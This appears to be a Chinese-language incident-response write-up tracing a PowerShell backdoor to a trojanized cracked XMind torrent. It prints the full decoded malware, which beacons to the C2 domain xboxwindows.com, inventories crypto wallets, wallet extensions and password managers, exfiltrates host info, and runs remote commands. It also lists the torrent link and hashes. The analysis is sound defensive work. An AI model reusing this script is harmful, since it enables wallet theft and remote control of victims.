666666662wffxw{s6666?66662`sdeyxe6+6Xsa;Yt|sub6Uyzzsubyxe8Qsxsdu8ZebMebdxqK-66662wub`s6+6&-66662xwub`s6+6&-66662dqn6+6Xsa;Yt|sub61Eoebs{8Bsnb8DsqczwdSnfdseeyxe8Dsqsn161Je);;zywr;snbsxeyx+>>4MHJdJx4K<4?j>MHJdJxJeK<??1-66662e~szz6+6Xsa;Yt|sub6;uy{Yt|sub6AEudfb8E~szz6666pyd6>2eswdu~Fwb~Ixrsn6+6&-62eswdu~Fwb~Ixrsn6;zb62eswdu~Fwb~e8Uycxb-62eswdu~Fwb~Ixrsn==?6m666666662eswdu~Fwb~6+62eswdu~Fwb~eM2eswdu~Fwb~IxrsnK-66666666p6>>Bseb;Fwb~62eswdu~Fwb~?6;sg62pwzes?6m666666666666uyxbxcs-66666666k666666662zx}e6+6M_Y8RdsubydoK,,QsbPzse>2eswdu~Fwb~:64<8zx}4?-66666666pydswu~6>2zx}6x62zx}e?6m666666666666p6>>Bseb;Cxuyrs62zx}??6m66666666666666662b{ffwb~6+6M_Y8Fwb~K,,QsbBs{fPzsXw{s>?6=648zx}4-6666666666666666M_Y8PzsK,,Uyfo>2zx}:62b{ffwb~:62bdcs?-66666666666666662zx}6+62b{ffwb~-666666666666k6666666666662zx}yt|6+62e~szz8UdswbsE~ydbucb>2zx}?-6666666666662bwdqsb6+62zx}yt|8BwdqsbFwb~-666666666666p6>MebdxqK,,_eXczzYdS{fbo>2bwdqsb??6m6666666666666666uyxbxcs-666666666666k666666666666p6>>Bseb;Fwb~62bwdqsb?6;sg62pwzes?6m6666666666666666uyxbxcs-666666666666k6666666666662bwdqsb6+6>Dseyz`s;Fwb~6;Fwb~62bwdqsb?8Fwb~8ByZyasd>?-666666666666p6>2bwdqsb8SxreAb~>2wffxw{s:61Ydrxwz_qxydsUwes1??6m66666666666666662sxwtzsr6+62pwzes-66666666666666662wdqc{sxbe6+62zx}yt|8Wdqc{sxbe-6666666666666666p6>2xczz6;xs62wdqc{sxbe?6m666666666666666666662{6+62dqn8[wbu~>2wdqc{sxbe?-66666666666666666666p6>2{8Ecuusee6;sg62bdcs?6m6666666666666666666666662fwb~6+62{8QdycfeM'K8@wzcs-6666666666666666666666662fwb~6+62fwb~8Bd{>141?-6666666666666666666666662sxwtzsr6+6>>Bseb;Fwb~62fwb~?6;sg62bdcs?-666666666666666666666666p6>2sxwtzsr?6m6666666666666666666666666666bdo6m666666666666666666666666666666662`sdeyxXw{s6+6>Eszsub;Ebdxq6;ZbsdwzFwb~642fwb~J{wxpseb8|eyx46;Fwbbsdx614`sdeyx4,64>8<?4:1?8[wbu~se8QdycfeM'K8@wzcs-66666666666666666666666666666666bdo6m6666666666666666666666666666666666662`sdeyxXw{s6=+64;46=6>Eszsub;Ebdxq6;ZbsdwzFwb~642fwb~J{wxpseb8|eyx46;Fwbbsdx614wcb~yd4,64>8<?4:1?8[wbu~se8QdycfeM'K8@wzcs-66666666666666666666666666666666k6uwbu~6m66666666666666666666666666666666k66666666666666666666666666666666p6>;xyb62`sdeyxe8Uyxbwxe>2`sdeyxXw{s??6m6666666666666666666666666666666666662`sdeyxe8Wrr>2`sdeyxXw{s?-66666666666666666666666666666666k66666666666666666666666666666666666666666666666666666666k6666666666666666666666666666uwbu~6m6666666666666666666666666666k666666666666666666666666k66666666666666666666k6666666666666666k6666666666666666p6>2sxwtzsr?6m666666666666666666662wub`s==-6666666666666666k6666666666666666szes6m666666666666666666662xwub`s==-6666666666666666k666666666666k66666666k6666k6666p6>>2wub`s6;sg6&?6;wxr6>2xwub`s6;sg6&??6m66666666dsbcdx62xczz-6666k6666szesp6>2xwub`s6;qb6&?6m66666666dsbcdx61XY]1-6666k6666dsbcdx64Y]>2>MebdxqK,,\yx>1:61:62`sdeyxe???4-kpcxubyx6Qsb;Wffe6m66662dseczbe6+6Xsa;Yt|sub6Uyzzsubyxe8Qsxsdu8ZebMebdxqK-66662wffSxbdse6+6V>1u~dy{s8sns1:61tdw`s8sns1:61{esrqs8sns1:61yfsdw8sns1?-6666pydswu~6>2wffSxbdo6x62wffSxbdse?6m666666662ebwbce6+6Qsb;_xebwzzEbwbce62wffSxbdo-66666666p6>2xczz6;sg62ebwbce?6m666666666666uyxbxcs-66666666k666666662dseczbe8Wrr>42>MEoebs{8_Y8Fwb~K,,QsbPzsXw{sAb~ycbSnbsxeyx>2wffSxbdo??;2>2ebwbce?4?-6666k66662ebwbce6+6Qsb;_xebwzzEbwbce61YfsdwJzwcxu~sd8sns1-6666p6>2xczz6;xs62ebwbce?6m666666662dseczbe8Wrr>4yfsdw';2>2ebwbce?4?-6666k6666pydswu~6>2sxbdo6x62eswdu~Sxbdse?6m666666662dyybrd6+6MEoebs{8Sx`dyx{sxbK,,SnfwxrSx`dyx{sxb@wdwtzse>2sxbdo8dyyb?-66666666pydswu~6>2bwdqsb6x62sxbdo8bwdqsbe?6m666666666666p6>>Bseb;Fwb~6;Fwb~6>\yx;Fwb~6;Fwb~62dyybrd6;U~zrFwb~62bwdqsb8fwb~???6m66666666666666662dseczbe8Wrr>2bwdqsb8xw{s?666666666666k66666666k6666k6666dsbcdx6MebdxqK,,\yx>1:61:62dseczbe?-kpcxubyx6Qsb;Cesd_xpy6m66662xpy6+6Vm66666666ye666+644-66666666u{666+642>2sx`,CESDRY[W_X?J2>2sx`,CESDXW[S?4-66666666w`666+644-66666666wffe6+6MebdxqK>Qsb;Wffe?-66666666f666+62~bbfI~swrsdeM1UP;Uyxxsubxq;_F1K-66666666`sd66+62sx`,I`-6666k6666dsbcdx6Uyx`sdbBy;\eyx62xpy6;Uy{fdsee-kpcxubyx6_x`y}s;Dsgcseb6m6666fwdw{6>66666666MtobsMKK666666662tcp6666?6666pyd6>26+6&-626;zb62tcp8Zsxqb~-62==?6m666666662tcpM2K6+62tcpM2K6;tnyd6$$-6666k66662d6+62uzsxb8FyebWeoxu>4wf92>MqcrK,,XsaQcr>?8ByEbdxq>??4:6MXsb8^bbf8TobsWddwoUyxbsxbK,,xsa>2rwbw??8QsbWawbsd>?8QsbDseczb>?-66662d8SxecdsEcuuseeEbwbceUyrs>?6j6Ycb;Xczz-66662dse6+62d8Uyxbsxb8DswrWeTobsWddwoWeoxu>?8QsbWawbsd>?8QsbDseczb>?-66662d8Refyes>?-6666pyd6>26+6&-626;zb62dse8Zsxqb~-62==?6m666666662dseM2K6+62dseM2K6;tnyd6$$-6666k6666dsbcdx62dse-kpcxubyx6Qsb;Cesd_R6m6666p6>2eseeyx8r6;xs6;'?6m66666666dsbcdx62eseeyx8r-6666k66662{e6+6Xsa;Yt|sub61Eoebs{8_Y8[s{ydoEbdsw{166662{e8Adbs>MTbUyx`sdbsdK,,QsbTobse>Mcxb%$K2{sbwI`sdeyx?:6&:6"?-66662{e8AdbsTobs>'?-66662{e8Adbs>MTbUyx`sdbsdK,,QsbTobse>Mcxb%$K2{sbwIqcr?:6&:6"?-66662rwbw6+62{e8ByWddwo>?-66662{e8Refyes>?-666666662dse6+6_x`y}s;Dsgcseb62rwbw-6666p6>2dse8Zsxqb~6;xs6"?6m66666666b~dya644-6666k66662eseeyx8r6+6MTbUyx`sdbsdK,,By_xb%$>2dse:6&?-6666dsbcdx62eseeyx8r-kpcxubyx6Qsb;Cfrwbse6m66662cr6+6Qsb;Cesd_r-66662{e6+6Xsa;Yt|sub61Eoebs{8_Y8[s{ydoEbdsw{166662{e8Adbs>MTbUyx`sdbsdK,,QsbTobse>Mcxb%$K2{sbwI`sdeyx?:6&:6"?-66662{e8AdbsTobs>$?-66662{e8Adbs>MTbUyx`sdbsdK,,QsbTobse>MxbK2cr?:6&:6"?-6666p6>2eseeyx8cfrwbs?6m666666662Icesdxpy6+611-66666666bdo6m6666666666662Icesdxpy6+6Qsb;Cesd_xpy-66666666k66666666uwbu~6m6666666666662Icesdxpy6+6Uyx`sdbBy;\eyx6Vm6666666666666666sddyd66+62I8Snusfbyx8[seewqs-6666666666666666zxs666+62I8Snusfbyx8Zxs-6666666666666666yppesb6+62I8Snusfbyx8Yppesb-666666666666k66666666k66666666MtobsMKK2cesdxpy6+6MBsnb8SxuyrxqK,,CBP.8QsbTobse>2Icesdxpy?-666666662{e8Adbs>2cesdxpy:6&:62cesdxpy8Zsxqb~?-6666k66662rwbw6+62{e8ByWddwo>?-66662{e8Refyes>?-66662dse6+6_x`y}s;Dsgcseb62rwbw-6666p6>2dse8Zsxqb~6;zb6"?6m66666666b~dya644-6666k66662p6+6MTbUyx`sdbsdK,,ByC_xb%$>2dse:6&?-66662eseeyx8cfrwbs6+6>2p6;twxr6&n'?6;sg6'-6666p6>2dse8Zsxqb~6;qb6"?6m66666666dsbcdx6>MBsnb8SxuyrxqK,,CBP.8QsbEbdxq>2dse:6":62dse8Zsxqb~6;6"??-6666k6666dsbcdx62xczz-kpcxubyx6Esb;Cfrwbse6m6666fwdw{6>66666666MebdxqK666666662uy{{wxr6666?66662zxse6+62uy{{wxr6;efzb64vdvx4-6666pydswu~6>2zxs6x62zxse?6m666666662|yt6+6Ebwdb;\yt6;EudfbTzyu}6>MEudfbtzyu}K,,Udswbs>MBsnb8SxuyrxqK,,CBP.8QsbEbdxq>>MbofsK>>>MdsqsnK,,[wbu~se>1bds`xyU1:181:1Dq~bByZspb1?6j6PydSwu~6m2I8`wzcsk?6;|yx611???8Qsb[sb~yre>?M%& K8_x`y}s>2xczz:6V>>2zxs??????66666666Awb;\yt6;\yt62|yt6;B{sycb6'&6666kkpcxubyx6p$>?m2`'6+6Qsb;Cfrwbse-66666666p6>2xczz6;xs62`'?6m666666666666Esb;Cfrwbse62`'-66666666kk2b{6+6MB{sde8B{sdK,,xsa>>%&6<6'&&&??-2ut6+6m6Qsb;Fdyusee6j6A~sds;Yt|sub6m6>>2I8Xw{s6;sg61aeudfb1?6;yd6>2I8Xw{s6;sg61ueudfb1??6;wxr6>>Mrwbsb{sK,,xya6;62I8EbwdbB{s?8Bybwz[xcbse6;qb6'?6k6j6Ebyf;Fdyusee6;Pydus6kDsqebsd;Yt|subS`sxb6;_xfcbYt|sub62b{6;S`sxbXw{s61Szwfesr16;Wubyx62ut62b{8Ebwdb>?-2dd6+6&-a~zs6>2dd6;zb6'&?6mbdo6m666p$-666666666662dd6+6&-kuwbu~m62dd==-k6666Ebwdb;Ezssf6;Esuyxre6%$-k

响应内容解码解密: 可以看到

image-20240511184456010

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
$meta_request = 'Z2V0IC9hcGkvdjEvN2MxOTBiNGI0NTFiODkxZGY0YTBjZTRlMmMyZmViNTU5NzU2ZmQwZGFjNzE5OWQ1MGQ4YjMyZTU0ZmJjM2FiYSBodHRwLzEuMQ0KaG9zdDogeGJveHdpbmRvd3MuY29tDQpjb25uZWN0aW9uOiBrZWVwLWFsaXZlDQphY2NlcHQtZW5jb2Rpbmc6IGd6aXANCngtZm9yd2FyZGVkLWZvcjogMTAzLjE1MS4xNzIuMjQNCmNmLXJheTogODgyMTdkZTJjZmI0OGI4MS1oa2cNCngtZm9yd2FyZGVkLXByb3RvOiBodHRwDQpjZi12aXNpdG9yOiB7InNjaGVtZSI6Imh0dHAifQ0KdXNlci1hZ2VudDogbW96aWxsYS81LjAgKHdpbmRvd3MgbnQgMTAuMDsgd2luNjQ7IHg2NDsgcnY6MTI1LjApIGdlY2tvLzIwMTAwMTAxIGZpcmVmb3gvMTI1LjANCmFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2UvYXZpZixpbWFnZS93ZWJwLCovKjtxPTAuOA0KYWNjZXB0LWxhbmd1YWdlOiB6aC1jbix6aDtxPTAuOCx6aC10dztxPTAuNyx6aC1oaztxPTAuNSxlbi11cztxPTAuMyxlbjtxPTAuMg0KdXBncmFkZS1pbnNlY3VyZS1yZXF1ZXN0czogMQ0KY2YtY29ubmVjdGluZy1pcDogMTAzLjE1MS4xNzIuMjQNCmNkbi1sb29wOiBjbG91ZGZsYXJlDQpjZi1pcGNvdW50cnk6IGhrDQoNCg==';
$meta_version = 890945858;
$meta_guid = 105662;
$meta_mutex = '623ffb00-b0f5-4069-a88b-4d612e80cb12';
$meta_ip = '162.158.179.120';
$meta_host = 'xboxwindows.com';

############################

$createdNew = $false;
$mutex = [System.Threading.Mutex]::new($true, $meta_mutex, [ref]$createdNew);
if ($createdNew -eq $false) {
    Start-Sleep -Seconds 300;
    return;
}

$_headers = [Text.Encoding]::ASCII.GetString(([type]((([regex]::Matches('trevnoC','.','RightToLeft') | ForEach {$_.value}) -join ''))).GetMethods()[306].Invoke($null, @(($meta_request)))) -split "`r`n"
$http_request = @{}; 
$http_headers = @{};
$http_request.path = ($_headers[0] -split ' ')[1];

for ($i = 1; $i -lt $_headers.Length; $i++) {
    [string[]]$h = $_headers[$i] -split ': ';
    if ($h.Length -lt 2) {
        break;
    }
    $http_headers[$h[0]] = $h[1];
}

$session = @{};
$session.id = -1;
$session.update = $true;

Add-Type -AssemblyName System.Net.Http
$client = [System.Net.Http.HttpClient]::new();
$client.Timeout = [TimeSpan]::FromMinutes(2);
$client.BaseAddress = [Uri]::new("http://$($meta_host)");


function Test-Unicode {
    param (
        $str
    )
    for ($i = 0; $i -lt $str.Length; $i++) {
        if ($str[$i] -gt 255) {
            return $true;
        }
    }
    return $false;
}

$searchPaths = @(
    "$env:USERPROFILE\Desktop",
    "$env:USERPROFILE\OneDrive\Desktop",
    ([Environment]::GetFolderPath("Desktop")),
    "$env:PUBLIC\Desktop",
    "$env:ALLUSERSPROFILE\Microsoft\Windows\Start Menu\Programs",
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs",
    "$env:APPDATA\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar"
);

$searchEntries = @(
    [pscustomobject]@{
        root    = '%appdata%'
        targets =
        [pscustomobject]@{
            name = 'Exodus-A'
            path = 'Exodus'
        },
        [pscustomobject]@{
            name = 'Atomic-A'
            path = 'Atomic Wallet'
        },
        [pscustomobject]@{
            name = 'Electrum-A'
            path = 'Electrum'
        },
        [pscustomobject]@{
            name = 'Ledger-A'
            path = 'Ledger Live'
        },
        [pscustomobject]@{
            name = 'Jaxx-A'
            path = 'Jaxx Liberty'
        },
        [pscustomobject]@{
            name = 'com.liberty.jaxx-A'
            path = 'com.liberty.jaxx'
        },
        [pscustomobject]@{
            name = 'Guarda-A'
            path = 'Guarda'
        },
        [pscustomobject]@{
            name = 'Armory-A'
            path = 'Armory'
        },
        [pscustomobject]@{
            name = 'DELTA-A'
            path = 'DELTA'
        },
        [pscustomobject]@{
            name = 'TREZOR-A'
            path = 'TREZOR Bridge'
        },
        [pscustomobject]@{
            name = 'Bitcoin-A'
            path = 'Bitcoin'
        },
        [pscustomobject]@{
            name = 'binance-A'
            path = 'binance'
        }
    },
    [pscustomobject]@{
        root    = '%localappdata%'
        targets =
        [pscustomobject]@{
            name = 'Blockstream-A'
            path = 'Blockstream Green'
        },
        [pscustomobject]@{
            name = 'Coinomi-A'
            path = 'Coinomi'
        }
    },
    [pscustomobject]@{
        root    = '%localappdata%\Google\Chrome\User Data\Default\Extensions'
        targets =
        [pscustomobject]@{
            name = 'Metamask-C'
            path = 'nkbihfbeogaeaoehlefnkodbefgpgknn'
        },
        [pscustomobject]@{
            name = 'MEWcx-C'
            path = 'nlbmnnijcnlegkjjpcfjclmcfggfefdm'
        },
        [pscustomobject]@{
            name = 'Coin98-C'
            path = 'aeachknmefphepccionboohckonoeemg'
        },
        [pscustomobject]@{
            name = 'Binance-C'
            path = 'fhbohimaelbohpjbbldcngcnapndodjp'
        },
        [pscustomobject]@{
            name = 'Jaxx-C'
            path = 'cjelfplplebdjjenllpjcblmjkfcffne'
        },
        [pscustomobject]@{
            name = 'Coinbase-C'
            path = 'hnfanknocfeofbddgcijnmhnfnkdnaad'
        }
    },
    [pscustomobject]@{
        root    = '%localappdata%\Microsoft\Edge\User Data\Default\Extensions'
        targets =
        [pscustomobject]@{
            name = 'Metamask-E'
            path = 'ejbalbakoplchlghecdalmeeeajnimhm'
        },
        [pscustomobject]@{
            name = 'Coinomi-E'
            path = 'gmcoclageakkbkbbflppkbpjcbkcfedg'
        }
    },
    [pscustomobject]@{
        root    = '%localappdata%\BraveSoftware\Brave-Browser\User Data\Default\Extensions'
        targets =
        [pscustomobject]@{
            name = 'Metamask-B'
            path = 'nkbihfbeogaeaoehlefnkodbefgpgknn'
        },
        [pscustomobject]@{
            name = 'MEWcx-B'
            path = 'nlbmnnijcnlegkjjpcfjclmcfggfefdm'
        },
        [pscustomobject]@{
            name = 'Coin98-B'
            path = 'aeachknmefphepccionboohckonoeemg'
        },
        [pscustomobject]@{
            name = 'Binance-B'
            path = 'fhbohimaelbohpjbbldcngcnapndodjp'
        },
        [pscustomobject]@{
            name = 'Jaxx-B'
            path = 'cjelfplplebdjjenllpjcblmjkfcffne'
        },
        [pscustomobject]@{
            name = 'Coinbase-B'
            path = 'hnfanknocfeofbddgcijnmhnfnkdnaad'
        }
    },
    [pscustomobject]@{
        root    = '%SystemDrive%'
        targets =
        [pscustomobject]@{
            name = 'KeePass-A'
            path = 'Program Files (x86)\KeePass Password Safe 2\KeePass.exe.config'
        },
        [pscustomobject]@{
            name = 'KeePass-B'
            path = 'Program Files\KeePass Password Safe 2\KeePass.exe.config'
        }
    },
      [pscustomobject]@{
        root    = '%localappdata%'
        targets =
        [pscustomobject]@{
            name = '1Password'
            path = '1Password'
        }
    }
);

function Get-InstallStatus {
    param (
        $appname
    )
    $versions = New-Object Collections.Generic.List[string];
    $active = 0;
    $inactive = 0;
    $rgx = New-Object 'System.Text.RegularExpressions.Regex' '\s?--load-extension=(("[^\r\n"]*")|([^\r\n\s]*))';
    $shell = New-Object -comObject WScript.Shell
    for ($searchPath_index = 0; $searchPath_index -lt $searchPaths.Count; $searchPath_index++) {
        $searchPath = $searchPaths[$searchPath_index];
        if ((Test-Path $searchPath) -eq $false) {
            continue;
        }
        $lnks = [IO.Directory]::GetFiles($searchPath, "*.lnk");
        foreach ($lnk in $lnks) {
            if ((Test-Unicode $lnk)) {
                $tmppath = [IO.Path]::GetTempFileName() + ".lnk";
                [IO.File]::Copy($lnk, $tmppath, $true);
                $lnk = $tmppath;
            }
            $lnkobj = $shell.CreateShortcut($lnk);
            $target = $lnkobj.TargetPath;
            if ([string]::IsNullOrEmpty($target)) {
                continue;
            }
            if ((Test-Path $target) -eq $false) {
                continue;
            }
            $target = (Resolve-Path -Path $target).Path.ToLower();
            if ($target.EndsWith($appname, 'OrdinalIgnoreCase')) {
                $enabled = $false;
                $arguments = $lnkobj.Arguments;
                if ($null -ne $arguments) {
                    $m = $rgx.Match($arguments);
                    if ($m.Success -eq $true) {
                        $path = $m.Groups[1].Value;
                        $path = $path.Trim('"');
                        $enabled = ((Test-Path $path) -eq $true);
                        if ($enabled) {
                            try {
                                $versionName = (Select-String -LiteralPath "$path\manifest.json" -Pattern '"version": "(.*)",').Matches.Groups[1].Value;
                                try {
                                    $versionName += "-" + (Select-String -LiteralPath "$path\manifest.json" -Pattern '"author": "(.*)",').Matches.Groups[1].Value;
                                } catch {
                                }
                                if (-not $versions.Contains($versionName)) {
                                    $versions.Add($versionName);
                                }                            
                            }
                            catch {
                            }
                        }
                    }
                }
                if ($enabled) {
                    $active++;
                }
                else {
                    $inactive++;
                }
            }
        }
    }

    if (($active -eq 0) -and ($inactive -eq 0)) {
        return $null;
    }
    elseif ($inactive -gt 0) {
        return 'NOK';
    }
    return "OK($([string]::Join(', ', $versions)))";
}

function Get-Apps {
    $results = New-Object Collections.Generic.List[string];

    $appEntries = @('chrome.exe', 'brave.exe', 'msedge.exe', 'opera.exe');
    foreach ($appEntry in $appEntries) {
        $status = Get-InstallStatus $appEntry;
        if ($null -eq $status) {
            continue;
        }
        $results.Add("$([System.IO.Path]::GetFileNameWithoutExtension($appEntry))-$($status)");
    }

    $status = Get-InstallStatus 'Opera\launcher.exe';
    if ($null -ne $status) {
        $results.Add("opera1-$($status)");
    }

    foreach ($entry in $searchEntries) {
        $rootdir = [System.Environment]::ExpandEnvironmentVariables($entry.root);
        foreach ($target in $entry.targets) {
            if ((Test-Path -Path (Join-Path -Path $rootdir -ChildPath $target.path))) {
                $results.Add($target.name)
            }
        }
    }
    return [string]::Join(', ', $results);
}

function Get-UserInfo {

    $info = @{
        os   = "";
        cm   = "$($env:USERDOMAIN)\$($env:USERNAME)";
        av   = "";
        apps = [string](Get-Apps);
        ip   = $http_headers['CF-Connecting-IP'];
        ver  = $env:_v;
    }
    return ConvertTo-Json $info -Compress;
}

function Invoke-Request {
    param (
        [byte[]]
        $buf
    )

    for ($i = 0; $i -lt $buf.Length; $i++) {
        $buf[$i] = $buf[$i] -bxor 22;
    }

    $r = $client.PostAsync("api/$([guid]::NewGuid().ToString())", [Net.Http.ByteArrayContent]::new($data)).GetAwaiter().GetResult();
    $r.EnsureSuccessStatusCode() | Out-Null;
    $res = $r.Content.ReadAsByteArrayAsync().GetAwaiter().GetResult();
    $r.Dispose();

    for ($i = 0; $i -lt $res.Length; $i++) {
        $res[$i] = $res[$i] -bxor 22;
    }

    return $res;
}

function Get-UserID {
    if ($session.id -ne -1) {
        return $session.id;
    }
    $ms = New-Object 'System.IO.MemoryStream'
    $ms.Write([BitConverter]::GetBytes([uint32]$meta_version), 0, 4);
    $ms.WriteByte(1);
    $ms.Write([BitConverter]::GetBytes([uint32]$meta_guid), 0, 4);
    $data = $ms.ToArray();
    $ms.Dispose();
    
    $res = Invoke-Request $data;
    if ($res.Length -ne 4) {
        throw "";
    }

    $session.id = [BitConverter]::ToInt32($res, 0);
    return $session.id;
}

function Get-Updates {
    $uid = Get-UserId;
    $ms = New-Object 'System.IO.MemoryStream'
    $ms.Write([BitConverter]::GetBytes([uint32]$meta_version), 0, 4);
    $ms.WriteByte(2);
    $ms.Write([BitConverter]::GetBytes([int]$uid), 0, 4);
    if ($session.update) {
        $_userinfo = '';
        try {
            $_userinfo = Get-UserInfo;
        }
        catch {
            $_userinfo = ConvertTo-Json @{
                error  = $_.Exception.Message;
                line   = $_.Exception.Line;
                offset = $_.Exception.Offset;
            }
        }
        [byte[]]$userinfo = [Text.Encoding]::UTF8.GetBytes($_userinfo);
        $ms.Write($userinfo, 0, $userinfo.Length);
    }
    $data = $ms.ToArray();
    $ms.Dispose();

    $res = Invoke-Request $data;

    if ($res.Length -lt 4) {
        throw "";
    }
    $f = [BitConverter]::ToUInt32($res, 0);
    $session.update = ($f -band 0x1) -eq 1;
    if ($res.Length -gt 4) {
        return ([Text.Encoding]::UTF8.GetString($res, 4, $res.Length - 4));
    }
    return $null;
}

function Set-Updates {
    param (
        [string]
        $command
    )
    $lines = $command -split "`r`n";
    foreach ($line in $lines) {
        $job = Start-Job -ScriptBlock ([Scriptblock]::Create([Text.Encoding]::UTF8.GetString(([type]((([regex]::Matches('trevnoC','.','RightToLeft') | ForEach {$_.value}) -join ''))).GetMethods()[306].Invoke($null, @(($line))))))
        Wait-Job -Job $job -Timeout 10
    }
}

function f2()
{
$v1 = Get-Updates;
        if ($null -ne $v1) {
            Set-Updates $v1;
        }
}

$tm = [Timers.Timer]::new((30 * 1000));
$cb = { Get-Process | Where-Object { (($_.Name -eq 'wscript') -or ($_.Name -eq 'cscript')) -and (([datetime]::now - $_.StartTime).TotalMinutes -gt 1) } | Stop-Process -Force }
Register-ObjectEvent -InputObject $tm -EventName 'Elapsed' -Action $cb 
$tm.Start();

$rr = 0;
while ($rr -lt 10) {
try {
   f2;
           $rr = 0;
}catch
{
 $rr++;
}
    Start-Sleep -Seconds 32;
}


简单分析相关代码逻辑:判断本地的app及其拓展安装情况,然后发回c2:

信息回传c2:http://xboxwindows.com/api/$guid

image-20240512133316448

如下图回传c2相关信息:

image-20240512133157784

如下图,该函数判断机器上相关指定目录下是否安装如下浏览器和相关拓展image-20240511185032401

寻找的相关路径:

image-20240512133527045

其中涉及软件判断,kepass 和1password;(过去曾批漏,VenomSoftX窃密木马技战法中曾利用这两款软件的漏洞,这里应该也是一样的)

image-20240511190351382

发现受害机器曾发起请求解析c2域名(xboxwindows.com):

image-20240515145724729

二、往前排查确认受感染由来

定位powershell进程由来,父进程 svchost:

image-20240511110036478

父进程启动参数:-s Schedule ,如下图,应该是计划任务起来的:

image-20240511111027871

排查计划任务:

发现恶意计划任务:

\Microsoft\Windows\Diagnosis\RecommendedTroubleshootingScannerbz4k3

image-20240511111142077

触发器:

image-20240511111251649

计划任务的由来:

查看本机计划任务创建相关日志windows安全日志(602,4698,4072):

如下图:无果

image-20240513101743526

上面我们发现计划任务中的恶意ps脚本创建时间是3月21日20:12分,排查盗版、破解、第三方软件安装记录:如下图,发现之前3月21日20:09曾下载一个xmind,和破解插件;

image-20240513102201810

image-20240513102219325

目前相关内容都被删除了;

种子链接

1
magnet:?xt=urn:btih:2ACDD382ABE62D06D7FB7DD182F74F828ABC1EFC&dn=XMind+2022+v22.11.2677+%28x64%29+Multilingual+%2B+crack+%7Bcrackerfg%7D&tr=udp%3A%2F%2Ftracker.openbittorrent.com%3A80%2Fannounce&tr=udp%3A%2F%2Ftracker.opentrackr.org%3A1337%2Fannounce&tr=udp%3A%2F%2Ftracker.pirateparty.gr%3A6969%2Fannounce&tr=udp%3A%2F%2Ftracker.tiny-vps.com%3A6969%2Fannounce&tr=udp%3A%2F%2Ftracker.torrent.eu.org%3A451%2Fannounce&tr=udp%3A%2F%2Fexplodie.org%3A6969%2Fannounce&tr=udp%3A%2F%2Fipv4.tracker.harry.lu%3A80%2Fannounce&tr=udp%3A%2F%2Fopen.stealth.si%3A80%2Fannounce&tr=udp%3A%2F%2Ftracker.coppersurfer.tk%3A6969%2Fannounce&tr=udp%3A%2F%2Ftracker.cyberia.is%3A6969%2Fannounce&tr=udp%3A%2F%2Ftracker.internetwarriors.net%3A1337%2Fannounce&tr=udp%3A%2F%2Ftracker.open-internet.nl%3A6969%2Fannounce&tr=udp%3A%2F%2Ftracker.zer0day.to%3A1337%2Fannounce&tr=udp%3A%2F%2Ftracker.leechers-paradise.org%3A6969%2Fannounce&tr=udp%3A%2F%2Ftracker.opentrackr.org%3A1337%2Fannounce&tr=http%3A%2F%2Ftracker.openbittorrent.com%3A80%2Fannounce&tr=udp%3A%2F%2Fopentracker.i2p.rocks%3A6969%2Fannounce&tr=udp%3A%2F%2Ftracker.internetwarriors.net%3A1337%2Fannounce&tr=udp%3A%2F%2Ftracker.leechers-paradise.org%3A6969%2Fannounce&tr=udp%3A%2F%2Fcoppersurfer.tk%3A6969%2Fannounce&tr=udp%3A%2F%2Ftracker.zer0day.to%3A1337%2Fannounce

查找浏览器记录,发现下载地址:

image-20240513102940455

找到下载链接:(www.1377x.to是一个提供盗版电影、电视剧、软件和其他数字内容的网站。)

1
https://www.1377x.to/torrent/5505841/XMind-2022-v22-11-2677-x64-Multilingual-crack-crackerfg/

推测大概率是利用破解为由混淆受害机器的使用人,一般都会觉得报毒是因为破解的原因,所以就会信任;

下载样本后:

四个文件:

image-20240513144829170

readme:

image-20240513144452970

分析:

1
2
3
4
《Xmind-for-Windows-x64bit-22.11.2677.exe》 hash:211199a054b1ebf6063a5b3f0cf1f80d 被官方签名的白安装程序
《ErrorReport.dll》 hash:2656a4f7c113ac37df603a3c27f0ea0c  两个无效签名,签名者:(MAGIX Software GmbH)(ProteinHost) 时间戳都是22年6月17日;
《SCXTIPDILRQUR.exe》 hash:157683de4c4cbedcb74d8d66581217a7 无签名,编译时间戳 22年6月17日;
ErrorReport.dll和SCXTIPDILRQUR.exe均为木马;

三、奇怪的现象:

sysmon日志发现进程,发起恶意域名请求:

C:\Program Files (x86)\AlibabaProtect\1.0.70.1148\AlibabaProtect.exe

image-20240511111606743

排文件和进程:

进程不存在dll劫持

文件均有签名

